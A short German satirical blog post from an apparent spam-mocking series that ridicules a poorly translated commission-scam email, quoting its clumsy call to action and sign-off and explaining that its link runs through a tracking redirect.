Der Absender dieser Mail, der offenbar in internationalen „Geschäften“ macht, überweist nicht nur Provisionen an Unbekannte, sondern ist auch noch sehr wirtschaftlich und hat sich die paar Euro zwanzig für einen richtigen Dolmetscher gespart, so dass auch nach dreimaligen Lesen nicht klar wird, was er mit seinen „geschäftlichen“ Texten überhaupt sagen will.

Wer würde bei so einem Müll nicht sofort…

=> Jetzt anmelden, um zu starten erhalten Ihre Provisionen!

…klicki klicki auf das Linki klicki? Natürlich über ein Skript, dem man eine eindeutige ID übermittelt und das dann auf die eigentliche Site weiterleitet, so dass die Spammer auch wissen, welche Empfänger in der Spam herumklicken. Was man in einer Spam derartiger Betrüger nur noch selten sieht, ist ein direkter Link.

Und nachdem mit nichtssagendem Text der Link untergebracht wurde, steht der Spammer nur noch vor einer Herausforderung: Den Unsinn mit einer halbwegs glaubwürdigen und nicht unmittelbar lächerlichen Grußformel abzuschließen:

Danke,

– Unterstützung

Auch daran ist der Spammer gescheitert.

Diese Spam aus der alltäglichen Hölle im Postfach ist ein Zustecksel meines Lesers R.R.F.

Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.